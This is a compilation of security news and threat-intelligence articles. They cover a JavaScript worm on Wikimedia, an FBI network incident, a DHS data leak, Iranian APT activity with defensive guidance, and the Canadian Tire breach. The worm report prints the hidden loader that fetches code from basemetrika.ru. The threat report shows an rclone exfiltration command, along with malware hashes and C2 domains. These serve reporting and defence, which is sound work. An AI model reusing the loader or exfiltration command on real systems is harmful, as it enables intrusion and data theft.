According to Wikimedia's Phabricator issue tracker, it appears the incident started after a malicious script hosted on Russian Wikipedia was executed, causing a global JavaScript script on Wikipedia to be modified with malicious code.

The malicious script was stored at User:Ololoshka562/test.js [Archive], first uploaded in March 2024 and allegedly associated with scripts used in previous attacks on wiki projects.

Based on edit histories reviewed by BleepingComputer, the script is believed to have been executed for the first time by a Wikimedia employee account earlier today while testing user-script functionality. It is not currently known whether the script was executed intentionally, accidentally loaded during testing, or triggered by a compromised account.

BleepingComputer's review of the archived test.js script shows it self-propagates by injecting malicious JavaScript loaders into both a logged-in user's common.js and Wikipedia's global MediaWiki:Common.js, which is used by everyone.

MediaWiki allows both global and user-specific JavaScript files, such as MediaWiki:Common.js and User:<username>/common.js, which are executed in editors’ browsers to customize the wiki interface.

After the initial test.js script was loaded in a logged-in editor's browser, it attempted to modify two scripts using that editor's session and privileges:

User-level persistence: it tried to overwrite User:<username>/common.js with a loader that would automatically load the test.js script whenever that user browses the wiki while logged in.
Site-wide persistence: If the user had the right privileges, it would also edit the global MediaWiki:Common.js script, so that it would run for every editor that uses the global script.

Code to inject a self-propagating JavaScript worm into the MediaWiki:Common.js script
Code to inject a self-propagating JavaScript worm into the MediaWiki:Common.js script
Source: BleepingComputer
If the global script was successfully modified, anyone loading it would automatically execute the loader, which would then repeat the same steps, including infecting their own common.js, as shown below.

A Wikimedia user's infected common.js script
A Wikimedia user's infected common.js script
Source: BleepingComputer
The script also includes functionality to edit a random page by requesting one via the Special:Random wiki command, then editing the page to insert an image and the following hidden JavaScript loader.

[[File:Woodpecker10.jpg|5000px]]
<span style="display:none">
[[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]
</span>
According to BleepingComputer's analysis, approximately 3,996 pages were modified, and around 85 users had their common.js files replaced during the security incident. It is unknown how many pages were deleted.

Pages modified by JavaScript worm
Pages modified by JavaScript worm
Source: BleepingComputer
As the worm spread, engineers temporarily restricted editing across projects while reverting the malicious changes and removing references to the injected scripts.

During the cleanup, Wikimedia Foundation staff members also rolled back the common.js for numerous users across the platform. These modified pages have now been "supressed" and are no longer visible in the change histories.

At the time of writing, the injected code has been removed, and editing is once again possible.

However, Wikimedia has not yet published a detailed post-incident report explaining exactly how the dormant script was executed or how widely the worm propagated before it was contained.

Update 3/5/26 7:45 PM ET: The Wikimedia Foundation shared the following statement with BleepingComputer, stating that the code was active for only 23 minutes, during which it only changed and deleted content on Meta-Wiki, which has since been restored.

"Earlier today, Wikimedia Foundation staff were conducting a security review of user-authored code on Wikipedia. During that review, we activated dormant code that was then quickly identified to be malicious. As a preventative measure, we temporarily disabled editing on Wikipedia and other Wikimedia projects while we removed the malicious code and confirmed the website was safe for user activity. The security issue behind this disruption has now been resolved.

The code was active for a 23 minute period. During that time, it changed and deleted content on Meta-Wiki – which is now being restored – but it did not cause permanent damage. We have no evidence that Wikipedia was under attack, or that personal information was breached as part of this incident. We are developing additional security measures to minimize the risk of this kind of incident happening again. Updates continue to be made available via the Foundation's public incident log."

cyberscoop.com
Written by Tim Starks

The FBI found evidence that its networks had been targeted in a suspected cybersecurity incident, the bureau confirmed on Thursday, without sharing any further details.

“The FBI identified and addressed suspicious activities on FBI networks, and we have leveraged all technical capabilities to respond,” the agency said in a statement. “We have nothing additional to provide.”

CNN and CBS reported that the suspicious activity targeted a digital system the FBI uses to manage and conduct surveillance, including work related to foreign surveillance warrants, wiretaps and pen registers, which are used to trace phone and computer data like IP addresses and dialed phone numbers.

News broke in 2024 that the Chinese hacking group Salt Typhoon had exploited the U.S. wiretapping system under the Communications Assistance for Law Enforcement Act that law enforcement and intelligence agencies rely upon, but CNN reported that it wasn’t clear if there was a connection between the 2024 and recent suspected incidents.

It also wasn’t clear when the incident occurred, or who was responsible.

The FBI, like virtually every federal agency, is no stranger to being targeted or infiltrated by hackers.

In 2023, the FBI said it had isolated and contained a cyber intrusion in its New York Field Office. In 2021, hackers exploited a misconfigured FBI server to send hoax emails, although the bureau said its own systems weren’t affected.

Congress, former agents and others have raised concerns about the FBI’s cyber capabilities among budget cuts and the loss of personnel under the second Trump administration. Brett Leatherman, leader of the bureau’s cyber division, told CyberScoop recently that it has suffered no diminishment of its ability to respond to threats and incidents.

Tim Starks

| TechCrunch techcrunch.com
Lorenzo Franceschi-Bicchierai
8:11 AM PST · March 2, 2026

A group of hacktivists calling themselves “Department of Peace” claimed to have hacked the Department of Homeland Security (DHS), leaking allegedly stolen documents online.

On Sunday, the nonprofit transparency collective DDoSecrets published data relating to contracts between DHS, Immigration and Customs Enforcement (ICE), and more than 6,000 companies, including defense contractors Anduril, L3Harris, Raytheon, and surveillance enabler Palantir, as well as tech giants Microsoft and Oracle.

The hacktivist said the data comes from the Office of Industry Partnership, a unit within DHS that procures technology from the private sector.

DHS and ICE did not immediately respond to a request for comment.

Department of Peace explained their motives in a document alongside the hack, citing the recent killings of two peaceful protesters, U.S. citizens Alex Pretti and Renée Good, earlier this year in Minneapolis by federal agents.

“Why hack the DHS? I can think of a couple Pretti Good reasons! I’m releasing this because the DHS is killing us and people deserve to know which companies support them and what they’re working on,” the hackers wrote.

Since the beginning of the Trump administration, DHS and federal immigration agents with ICE have undertaken a campaign of mass deportations, arresting people with largely no criminal records, and detaining them in overcrowded facilities where critics say they are held in inhumane conditions. The mass deportation campaign has been aided by several tech companies, with Palantir at the forefront.

Security researcher Micah Lee organized the leaked data on a dedicated website, making the information easily searchable.

The site shows the name of the contractors, the amount of money they were awarded, as well as contact information, such as full names, email addresses, and phone numbers.

The largest contracts by total money awarded included $70 million for Cyber Apex Solutions, a company that claims on its barebones website to be “focused on filling the security gaps of critical infrastructure” in the U.S.; and $59 million for Science Applications International Corporation (SAIC), which provides AI services for government agencies. Underwriters Laboratories was awarded $29 million to provide testing, certification, and market intelligence to customers.

Cyber Apex Solution, SAIC, and Underwriters Laboratories did not immediately respond to a request for comment.

This story was updated to clarify that Palantir enables, not provides, surveillance for the government.

| SECURITY.COM
5 Mar 2026

This activity began in early February and has continued in recent days. What organizations should expect next from Iran-aligned groups and the steps they should take to guard against cyberattacks.

This activity began in early February and has continued in recent days. What organizations should expect next from Iran-aligned groups and the steps they should take to guard against cyberattacks.
Threat Intelligence
5 Mar 2026
23 Min Read
Share
Activity associated with Iranian APT group Seedworm has been spotted on the networks of multiple U.S. companies. The activity began in February 2026 and has continued in recent days.
A U.S. bank, airport, non-profit and the Israeli operations of a U.S. software company were among the targets.
We round up details of recent Iranian cyber threat activity and what defenders need to look out for.

The Iranian APT group Seedworm (aka MuddyWater, Temp Zagros, Static Kitten) has been active on the networks of multiple U.S. companies since the beginning of February 2026, with activity continuing in recent days following U.S. and Israeli military strikes on Iran that have sparked conflict in the region.

A U.S. bank, software company and airport, and non-governmental organizations in both the U.S. and Canada, have experienced suspicious activity on their networks in recent days and weeks. The software company is a supplier to the defense and aerospace industries among others, and has a presence in Israel, with the company’s Israel operation seeming to be the target in this activity.

A previously unknown backdoor, which we have named Dindoor, was found on the networks of the Israeli outpost of this software company, with the same backdoor seen on the networks of a U.S. bank and the Canadian non-profit organization. This backdoor leverages Deno, the secure runtime for JavaScript and TypeScript, to execute. This backdoor was signed with a certificate issued to “Amy Cherne”.

There was also an attempt to exfiltrate data from the software company using Rclone to a Wasabi cloud storage bucket. It’s not clear if this was successful.

rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x

A different, Python backdoor called Fakeset was found on the networks of the U.S. airport and non-profit. It was signed by certificates issued to “Amy Cherne” and “Donald Gay”. The Donald Gay certificate has been used previously to sign malware linked to Seedworm. The backdoor was downloaded from two servers belonging to the Backblaze cloud storage company:

gitempire.s3.us-east-005.backblazeb2.com

elvenforest.s3.us-east-005.backblazeb2.com

The Donald Gay certificate was also used to sign a sample from the malware family we call Stagecomp and which downloads the Darkcomp backdoor. The Stagecomp and the Darkcomp malware have been linked to Seedworm by vendors including Google, Microsoft and Kaspersky. While this malware wasn’t seen on the targeted networks, the use of the same certificates suggests the same actor - namely Seedworm - was behind the activity on the networks of the U.S. companies.

While it’s not known if the operations of Seedworm are disrupted by the current conflict, already having a presence on U.S. and Israeli networks prior to the current hostilities beginning means the threat group is in a potentially dangerous position to launch attacks. While we have disrupted these breaches, other organizations could still be vulnerable to attack.

Seedworm is a long-standing Iranian threat group, which usually mounts classic espionage attacks for the purposes of spying and information gathering. Active since 2017, CISA has said that Seedworm is “a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).” Seedworm originally focused on victims in the Middle East but later broadened its scope to target telecommunications, defense, local government, and oil and natural gas organizations in Asia, Africa, Europe, and North America. The group develops its own custom malware as well as using dual-use and living off the land tools.

Context
On February 28, 2026, the U.S. and Israel launched a coordinated offensive military air operation targeting Iran, leading to the death of Iran’s Supreme Leader Ayatollah Ali Khamenei, who was apparently killed on March 1 when a U.S./Israeli airstrike hit his compound. Several other high-ranking Iranian officials, as well as multiple civilians, were also killed in strikes.

In retaliation, Iran launched drones and ballistic missiles at adversaries throughout the Gulf region, including targeting Israel and U.S. military and diplomatic outposts in multiple countries in the region.

Because of the heated tension in the region and ongoing attacks, it is likely Iran and its allies may also initiate cyber operations to further target their adversaries. Both Israel and Iran have a history of carrying out destructive cyberattacks, including against each other. While internet access in Iran may be disrupted by current military operations, there are cyber operatives working for the regime based in other countries.

The UK’s National Cyber Security Centre released an alert following this recent activity, stating that “Iranian state and Iran-linked cyber actors almost certainly currently maintain at least some capability to conduct cyber activity” and warning about the potential threat posed by “Iran-linked hacktivists”. Check Point also reported recently that the Handala threat group (see below) has been using the Starlink satellite network to stay online even before this most recent activity began, with the group reportedly leveraging the technology since mid-January, when a nationwide Internet shutdown was announced by Iran’s government.

Examining the cyber activity typically carried out by threat actors associated with Iran and its allies may help us predict the kinds of cyber operations we may see being executed as this conflict continues.

Iranian threat actors have become increasingly proficient in recent years. Not only has their tooling and malware improved, but they’ve also demonstrated strong social engineering capabilities, including spear-phishing campaigns and “honeytrap” operations used to build relationships with targets of interest to gain access to accounts or sensitive information.

One of the hallmarks of Iran’s operations in cyberspace is that it periodically mounts destructive attacks against organizations in countries it deems hostile, which at the moment would obviously include the U.S. and Israel. That creates a risk for organizations in those countries because these attacks are about sending a message rather than stealing information, which means that any organization in the country targeted could be in the firing line.

Other recent activity
Doxing Israeli officials and regional energy sector participants
Handala is an Iranian-aligned hacktivist group that is also known to operate in support of Palestine. They have been active since at least 2024. They are known for conducting attacks targeting Israeli organizations and entities perceived to support Israel by conducting phishing attacks, data theft, ransomware, extortion and destructive attacks, including the use of custom wipers. The group operates a leaks site where victim names are posted alongside stolen data and messages from the group. The group was also reportedly active on multiple underground cybercrime forums including BreachForums, Ramp and Exploit during its early days, but has since become more active on Telegram channels and X (formerly Twitter).

In December 2025, the group claimed to have compromised the mobile devices of former Israeli Prime Minister Naftali Bennett and Benjamin Netanyahu's Chief of Staff, Tzachi Braverman. The group leaked material they said they had stolen from the phones, including the contact information of prominent Israeli officials, journalists and business people, photos and videos. However, analysis by researchers disputed some of these claims, saying that the attacks appeared to be limited to Telegram accounts, and did not achieve complete phone access.

In February 2026, Handala claimed to have breached one of Israel's largest healthcare networks. Meanwhile, in March 2026, the group said it had breached Sharjah National Oil Corporation and Israel Opportunity Energy, exfiltrating more than 1.3TB of sensitive data, including confidential financial data, oil contracts and project details. The group has also made claims about breaching Saudi Arabian energy company Saudi Aramco in a post on its leaks site. However, the documents shared appeared to consist of older files that were already in circulation previously. This raises the possibility that the claim may have been exaggerated or partially fabricated, potentially representing an influence or psychological operation intended to generate attention, panic or reputation damage. The group has also posted messages claiming that Israeli Prime Minister Benjamin Netanyahu will be their next target.

Spearphishing academics and NGOs for intelligence collection
In an October 2025 campaign, Seedworm carried out a sophisticated spear-phishing attack that used a compromised mailbox to distribute a custom backdoor known as Phoenix to international organizations across the Middle East and North Africa (MENA), targeting more than 100 government entities as part of an espionage campaign.

The attackers leveraged a malicious Office attachment that has technical overlap with previously reported Seedworm attacks to deliver Phoenix. The command & control (C&C) server also reportedly hosted the PDQ remote access tool, which was used for remote access and persistence, as well as a custom browser credential stealer. It is believed the motive behind these attacks was intelligence collection, as well as persistent access, for the purposes of longer-term espionage and exfiltration.

Elsewhere, in November 2025, Seedworm was also linked to attacks that targeted academics with expertise on the Middle East and other foreign policy experts. This activity took place between June and August 2025. Suspicious spear-phishing emails impersonated Suzanne Maloney – the vice president and director of the Foreign Policy program at the Brookings Institution and an expert on Iran – using a Gmail address and a misspelled version of her name - “Suzzane Maloney.”. In the attacks, the actors started out using a benign email, which eventually led to a subsequent email that contained a malicious link to a remote access tool payload. It is likely these attacks were carried out as a means to perform espionage - more specifically, as a means to gather intelligence that could be leveraged for strategic advantage.

These attacks had TTP overlaps with other Iranian aligned groups (Smoke Sandstorm, Mint Sandstorm/Charming Kitten) but were subsequently attributed to Seedworm.

Other 2025 activity
Camera scanning for intelligence gathering
Marshtreader (Pink Sandstorm, Agrius, Agonizing Serpens) is a group that has been active since 2020 and is reportedly linked to Iran’s Ministry of Intelligence and Security (MOIS). It is known for its destructive operations against countries in the Middle East, specifically Israel, conducting attacks under multiple aliases and leveraging data leaks in order to control and shape narratives using wiper and fake ransomware malware.

In June 2025, it was reported that the group was observed scanning for vulnerable cameras using CVE-2023-6895 and CVE-2017-7921 across Israel during the June 2025 conflict using infrastructure associated with Iranian actors.

In previous conflicts, actors have been observed compromising cameras to gather intelligence to support bombing damage assessment (BDA) by providing near-real time visibility of impact from bombings and strikes. It is likely these attacks were conducted to gain similar visibility into sensitive locations to perform reconnaissance and potentially enable follow-on targeting of high value targets.

Additionally, in June 2025, a successful password-spraying attack conducted from Nord VPN infrastructure against Israeli municipal government entities was reported followed by spear-phishing attacks that contained links to a ClickFix page designed to trick users into executing malicious PowerShell to ultimately deliver a remote access tool (RAT) that can execute arbitrary commands by the attackers. It is likely the motive behind these attacks was account compromise and espionage. It is not clear what actor was behind these attacks, but the targeting of Israeli targets points to an Iranian actor as the most likely perpetrator.

DieNet DDoS attacks
DieNet is a pro-Palestinian hacktivist group that emerged on Telegram around March 2025 and announced its intention to target “outlaw sites and corrupt government platforms” using DDoS attacks.

Following the arrest of activist Mahmoud Khalil, its activities intensified, with the group claiming responsibility for multiple DDoS attacks against U.S. critical infrastructure, including energy, financial, healthcare, government, transit and communication systems.

In its attacks, the group leveraged high-volume DDoS attacks reportedly via DDoS-as-a-service infrastructure, including TCP RST, DNS amplification, TCP SYN floods and NTP amplification attacks, as well as website defacements and data breaches.

Based on reporting, its motives were likely political retaliation and service disruption.

What can we expect next?
Given Iran's history of attacks leveraging destructive wipers, distributed-denial-of-service (DDoS) and hack-and-leak attacks, the likely next steps for the nation’s cyber actors and supporters may be multiple campaigns combining high-visibility disruption for political signaling and lower-visibility access operations for strategic leverage.

Defenders should anticipate noisy activity such as DDoS attacks, defacements, and leak claims targeting government, transportation, energy and defense contractors to amplify psychological and economic pressure.

It is also likely that more capable state-aligned groups will continue credential harvesting operations, along with vulnerability exploitation and covert persistence against critical infrastructure to generate immediate impact, while also positioning themselves for potential future destructive, espionage or coercive operations.

DDoS and defacements
Given the increase in "hacktivist" activity, we predict a surge in DDoS and defacements for fast signaling and media impact, similar to what has been observed recently with Handala’s claims of targeting critical national infrastructure (CNI).

It is likely such attacks would target a range of sectors, including government portals, municipal sites, airports/ports, logistics providers, banks, telcos, media and symbolic brands.

Password spraying and mailbox compromises
Over the last year, multiple reports involving Iran-backed groups repeatedly highlighted credential attacks and mailbox compromises as a means of initial access and intelligence gathering.

Targets could include defense organizations, government, contractors and NGOs. Additionally, adjacent organizations that support base operations, including fuel, catering, logistics, and communications could also be targets of these attacks.

Leaks / intimidation operations / psyops
Hacktivists such as Handala repeatedly use leaks and claims to amplify fear and pressure even when access is only partial - this is key escalation behavior.

Potential targets of these kinds of attacks and claims would likely include healthcare, local government, airports/ports, transportation and education, as well as high-profile individuals tied to defense, politics and media.

Critical infrastructure and opportunistic attacks
Given the current escalations between the U.S. and Iran, it is likely that CNI is at high risk of attack, as well as organizations supporting these entities.

Organizations with exposed terminal operating systems, schedules and trucking/rail interfaces may be targeted, as well as passenger processing systems, baggage systems, and contractor networks. Additionally, given the high risk, other organizations that operate within sectors such as energy/fuel supply chains may be targets.

Destructive attacks
Iran has previously exhibited high capabilities in destructive potential, particularly during escalation windows.

Any attacks would likely to be focused on energy and utilities, transportation and logistics, financial sector, telecoms, healthcare, defense contractors and military suppliers.

How can defenders prepare?
Organizations should prepare by focusing on strengthening monitoring capabilities and ensure resilience across their infrastructure where possible. Early indicators such as vulnerability scanning, credential attacks and reconnaissance activity often provide an opportunity for defenders to detect intrusion attempts early in the attack chain.

DDoS and defacement campaigns
Due to the likelihood of early retaliation and intensifying psyops, defenders should expect attempts to disrupt public-facing services and monitor any internet-facing infrastructure for the following:

Spikes in HTTP requests from large, distributed IP ranges
Repeated probing of admin portals
Exploit attempts targeting web frameworks and content management systems
Scanning activity against exposed API endpoints
To prepare, organizations should look at performing the following:

Deploy web application firewalls (WAF) with updated rule sets
Enable DDoS protection via CDN or upstream filtering services
Decommission any non-essential or unused publicly accessible services
Ensure all up-to-date patches for web applications/plugins are applied regularly
Ensure website backups exist for rapid restoration, if required
Monitor underground forums, Telegram channels and social media for claims involving your organization
Credential attacks
Credential attacks are one of the most common initial access techniques used by Iranian-linked groups, which include attack attempts against multiple public-facing services.

Defenders should ensure monitoring is in place to identify patterns consistent with password-spraying attempts, such as the following:

Repeated login failure attempts across multiple users
Authentication attempts from unusual geographic locations
MFA fatigue attacks
Login attempts occurring outside of normal working hours
Vulnerability scanning and exploitation of vulnerable VPN appliances or edge infrastructure
Deployment of web shells on internet-facing servers
Credential harvesting through phishing campaigns
Organizations should review and harden any identity security mechanisms by performing the following:

Enable multi-factor authentication for all remote access
Disable legacy authentication protocols
Implement condition access policies based on location and device risk
Restrict admin logins to specific locations, where possible
Monitor identity provider logs for any anomalies
Leak campaigns and intimidation operations
Hacktivist groups often use hack-and-leak campaigns designed to gain media attention and apply psychological pressure, usually via partial data leaks and exaggerated breach claims. Security teams should watch for indicators of data staging or exfiltration, such as the following:

Unusual downloads from email systems
Unusual access to document repositories
Suspicious archive creation (e.g. ZIP, RAR) on internal systems, usually involving collection of multiple file types
Large outbound data transfers to external cloud storage platforms
Unexpected use of data-transfer applications (e.g. Rclone) in their environment
Organizations should focus on ensuring monitoring is in place for the following:

Large outbound data transfers
Implement data loss prevention (DLP) policies
Restrict access to external cloud storage platforms
Enable auditing of email and file access
Having a communications plan for potential leak claims can also help organizations respond quickly to these threats.

Attacks on critical infrastructure
Critical infrastructure organizations and companies that support military logistics may face attacks that attempt to compromise the following:

Operational Technology (OT) interfaces
Scheduled and logistics systems
Contractor networks
Remote management systems
Security teams should ensure adequate monitoring is in place for:

Abnormal access to ICS
Unexpected remote connections to operational networks
Authentication attempts targeting infrastructure management systems
Unusual configuration changes in critical systems
Vendor access and contractor networks
Organizations faced with these attacks, at a minimum, should ensure:

Network segmentation across operational technology networks
Restrict remote access to infrastructure systems
Monitor contractor VPN access
Maintain offline backups of critical configuration systems
Destructive attacks
Iran has repeatedly demonstrated its destructive capabilities in the past, with attacks such as Shamoon, which targeted Saudi Arabia's oil industry to wipe thousands of systems.

Organizations that anticipate such attacks should ensure they monitor for indicators that attackers may be preparing for a destructive operation such as:

Mass scheduled task creation
Attempts to disable security applications
Deletion of shadow copies or backup data
Unusual administrative commands executed across multiple hosts
Organizations should prioritize resilience against destructive attacks by conducting the following tasks:

Isolating backup infrastructure from production networks
Enable immutable backups
Test disaster recovery procedures regularly
Ensuring systems can be restored quickly is critical to recovering from the impact of destructive attacks.

Historical activity
Stuxnet
One of the most infamous cyber incidents to ever take place in the Middle East region was the deployment of the Stuxnet worm, which was designed to break laboratory equipment used by Iranian scientists to enrich uranium at the Natanz facility in Iran. Iran has claimed that this facility has been hit in strikes by Israel and the U.S. in recent days. The disruption of Iran’s nuclear program to prevent the country from developing nuclear weapons was one of the reasons given by the U.S. administration for carrying out these recent strikes. The facility was also hit in U.S. strikes in June 2025, which were believed at the time to have rendered the facility inoperable.

Stuxnet was among the first known major nation-state cyberattacks that demonstrated hackers’ ability to manipulate and even destroy physical equipment. Stuxnet was designed to cause the spinning motors at the bottom of Natanz's enrichment centrifuges to shatter. It was first published about by researchers at Symantec in 2010, after the worm spread outside of the Natanz facility and was found on private networks. Given that Stuxnet was only discovered after penetrating private networks, it is quite possible that cyber operations are currently being leveraged by and against infrastructure that we know nothing about - yet.

Reports last year indicated potential cyber warfare impacting the region then too, including an attack by pro-Israel hackers dubbed Predatory Sparrow on Iranian crypto exchange Nobitex in which the attackers drained $90 million of cryptocurrency from the exchange. There were also reports that Iranian group Damselfly was carrying out a targeted phishing campaign focused on high-profile Israeli individuals, particularly prominent academics, journalists, and security researchers (See more in Damselfly profile).

Damselfly is just one of the key cyber actors who may be active in the current conflict, potentially targeting the networks of significant institutions in other nations for espionage, disruptive or destructive purposes.

Other key actors
Druidfly
Druidfly (aka Homeland Justice, Karma) is an Iranian attack group that specializes in disk-wiping attacks. It first came to public attention after a July 2022 wiper attack on multiple targets belonging to the government of Albania. The wiper left messages directed against the Mujahideen E-Khalq (MEK), an Iranian dissident organization based in Albania. Shortly afterward, a group calling itself Homeland Justice claimed credit for the attack.

In response to the attack, Albania broke off diplomatic relations with Iran. This triggered another wave of attacks in September 2022, apparently in retaliation for Albania publicly attributing the attacks to Iran. While Homeland Justice purported to be a hacktivist outfit, the FBI later established that “Iranian state cyber actors” were responsible for the attacks.

Druidfly reappeared in 2023, when it began targeting Israel with a wiper called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is “Bibi” (See Case Study).

On June 20, 2025, when hostilities between Iran and Israel were previously at a high, we tweeted that we had seen a Druidfly wiper targeting organizations in Albania. The wiper was signed with a legitimate certificate, which was probably stolen. On the Monday following (June 23), it was reported in the media that public services in Albania’s capital Tirana had been disrupted by a cyber attack that took down the city’s official website and affected local government operations. Homeland Justice claimed credit for the attack and said it had taken down the city’s official website, exfiltrated data and wiped servers, citing the presence of MEK in the country as the reason for the attack.

Case study: Druidfly attacks on Israeli targets

Following the escalation of the conflict in Gaza in 2023, Druidfly was linked to a series of wiper attacks against multiple targets in Israel. In this case, the attacks were carried out under a persona called Karma that purports to be a hacktivist group sympathetic to the Palestinian cause.

The wiper deployed in these attacks was called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is Bibi. The wiper encrypted files on the hard disk before overwriting the master boot record (MBR) and crashing the computer. Efforts to restart the computer would fail because of the destruction of the MBR. Analysis of the wiper revealed clear anti-Israel messages within the wiper’s code.

Figure 1: Message in BibiWiper code suggesting that Israel is not a country
Figure 1: Message in BibiWiper code suggesting that Israel is not a country
Furthermore, analysis of BibiWiper by the Threat Hunter Team found clear similarities between it and wipers deployed by Druidfly during attacks against Albania in 2022 and 2023.

Tracing other tools used to initiate the BibiWiper attacks against Israel revealed the following overlap in tactics, techniques, and procedures between these attacks and earlier Druidfly attacks:

HTTPSnoop malware was previously deployed prior to the Druidfly wiping attacks
Use of the remote desktop tools AnyDesk and ScreenConnect
Use of ReGeorg web shells
Damselfly
Damselfly (aka Charming Kitten, Mint Sandstorm) is an Iranian espionage group that has been active since 2014. It was initially known for targeting Israel with attacks before it broadened its focus to include the U.S. and other countries. While the group is principally known to be involved in intelligence gathering, members of the group are also known to have participated in extortion attacks. It has been linked by multiple vendors with Iran’s Islamic Revolutionary Guard Corps (IRGC).

In March 2022, Damselfly was one of several Iranian groups reported to have moved into mounting large-scale social engineering campaigns. Consistent features of these campaigns included the use of charismatic sock puppets, lures of prospective job opportunities, solicitation by journalists, and masquerading as think tank experts seeking opinions. The attackers leveraged networks such as LinkedIn, Facebook, Twitter, and Google.

Damselfly has also been linked to an attack targeting a nuclear security expert at a U.S.-based think tank in July 2023; attacks on Israel’s transportation, logistics, and technology sectors in November 2023; as well as a January 2024 campaign targeting individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the UK, and the U.S. The attackers in that campaign used bespoke phishing lures themed around the Israel-Hamas conflict to trick targets into downloading malware.

In 2025, Check Point reported that a new Damselfly campaign that began in mid-June 2025 targeted Israeli journalists, cyber security experts and computer science professors from leading Israeli universities with spear phishing campaigns in an attempt to steal credentials and multi-factor authentication codes in order to gain access to targets’ email accounts. Some of the victims were approached by attackers who posed as fictitious assistants to technology executives or researchers through emails and WhatsApp messages.

Mantis
Active since at least 2014, Mantis (aka Desert Falcon, Arid Viper, APT-C-23), is an Arabic speaking group that appears to be based in the Gaza Strip. The group is known to mount espionage attacks against targets in the government, military, media, financial, research, education, and energy sectors. Most of its attacks have been against organizations in the Middle East but it has, on occasion, attacked targets outside the region. It has also been known on occasion to target individuals or organizations internally within Gaza. While other vendors have linked the group to Hamas, the Threat Hunter Team cannot make a definitive attribution to any Palestinian organization.

The group mainly favors spear-phishing emails with malicious attachments or links to malicious files as its main infection vector. Mantis uses custom malware and its most recent toolset includes the backdoors Trojan.Micropsia and Trojan.AridGopher. Micropsia is capable of taking screenshots, keylogging, and archiving certain file types using WinRAR in preparation for data exfiltration. However, its main purpose appears to be running secondary payloads for the attackers. Arid Gopher is a modular backdoor that is written in Go. It appears to be regularly updated and rewritten by the attackers, most likely to evade detection.

These tools were used in a Mantis attack in late 2022/early 2023 that targeted organizations within the Palestinian territories. The initial infection vector for this campaign remains unknown, but both the Micropsia and AridGopher malware were deployed in this attack. In one intrusion, the attackers deployed three distinct versions of the same toolset (that is, different variants of the same tools) on three groups of computers. Compartmentalizing the attack in this fashion was likely a precautionary measure. If one toolset was discovered, the attackers would still have a persistent presence on the target’s network.

Indicators of Compromise (IOCs)
0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542 - Trojan.Dindoor

1d984d4b2b508b56a77c9a567fb7a50c858e672d56e8cf7677a1fca5c98c95d1 - Trojan.Dindoor

2a00705cfd3c15cf8913e9eb4e23968efd06f1feceaef9987d26c5518887d043 - Trojan.Dindoor

2a09bbb3d1ddb729ea7591f197b5955453aa3769c6fb98a5ef60c6e4b7df23a5 - Trojan.Dindoor

42a5db2a020155b2adb77c00cbe6c6ad27c2285d8c6114679d9d34137e870b3f - Trojan.Dindoor

7467f326677a4a2c8576e71a832e297e794ea00e9b67c4fcbe78b5aec697cec4 - Trojan.Dindoor

7c30c16e7a311dc0cdb1cdfd9ea6e502f44c027328dbe7d960b9bcd85ccf5eef - Trojan.Dindoor

b0af82de672d81f3c2f153977923b3884a8a9e7045b182c2379b19a1996931a0 - Trojan.Dindoor

bd8203ab88983bc081545ff325f39e9c5cd5eb6a99d04ae2a6cf862535c9829a - Trojan.Dindoor

c7cf1575336e78946f4fe4b0e7416b6ebe6813a1a040c54fb6ad82e72673478e - Trojan.Dindoor

077ab28d66abdafad9f5411e18d26e87fe43da1410ee8fe846bd721ab0cb52de - Trojan.Fakeset

15061036c702ad92b56b35e42cf5dc334597e7311e98d2fdd3815a69ac3b1d84 - Trojan.Fakeset

2b7d8a519f44d3105e9fde2770c75efb933994c658855dca7d48c8b4897f81e6 - Trojan.Fakeset

4aef998e3b3f6ca21c78ed71732c9d2bdcc8a4e0284f51d7462c79d446fbc7be - Trojan.Fakeset

64263640a6fdeb2388bca2e9094a17065308cf8dcb0032454c0a71d9b78327eb - Trojan.Fakeset

64cf334716f15da1db7981fad6c81a640d94aa1d65391ef879f4b7b6edf6e7f1 - Trojan.Fakeset

74db1f653da6de134bdc526412a517a30b6856de9c3e5d0c742cb5fe9959ad0d - Trojan.Fakeset

94f05495eb1b2ebe592481e01d3900615040aa02bd1807b705a50e45d7c53444 - Trojan.Fakeset

a4bd1371fe644d7e6898045cc8e7b5e1562bdfd0e4871d46034e29a22dec6377 - Trojan.Fakeset

a5d4d6be3bfe0cba23fe6b44984b5fc9c7c7e10030be96120bb30da0f2545d4c - Trojan.Fakeset

ddceade244c636435f2444cd4c4d3dc161981f3af1f622c03442747ecef50888 - Trojan.Fakeset

24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14 - Trojan.Stagecomp

A92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0 - - Trojan.Stagecomp

3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90 - Trojan.Darkcomp

1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6 - Trojan.Darkcomp

Network Indicators

gitempire.s3.us-east-005.backblazeb2[.]com

elvenforest.s3.us-east-005.backblazeb2[.]com

uppdatefile[.]com

serialmenot[.]com

moonzonet[.]com

securityweek.com
ByIonut Arghire| February 28, 2026 (6:50 AM ET)

More than 38 million accounts were affected by an October 2025 data breach at Canadian retail giant Canadian Tire.

The incident was discovered on October 2 and involved unauthorized access to an e-commerce database, the company said.

“The database contained basic personal information for customers who have an e-commerce account with one or more of Canadian Tire, SportChek, Mark’s/L’Équipeur and Party City,” the retail giant announced in October.

Canadian Tire said at the time that the compromised information included names, email addresses, dates of birth, encrypted passwords, and, in some cases, incomplete credit card numbers.

Fewer than 150,000 accounts had date of birth details compromised, the company said.

Canadian Tire also underlined that the password and credit card information could not be used to access users’ accounts or to perform fraudulent transactions and purchases, and that no Canadian Tire Bank information or Triangle Rewards loyalty data was compromised in the incident.

This week, the data set associated with the incident was added to the data breach notification website Have I Been Pwned.

According to the website, roughly 42 million records were compromised in the attack, including 38.3 million email addresses. In addition to the details shared by Canadian Tire, the leaked compromised data also includes addresses, phone numbers, and gender information.

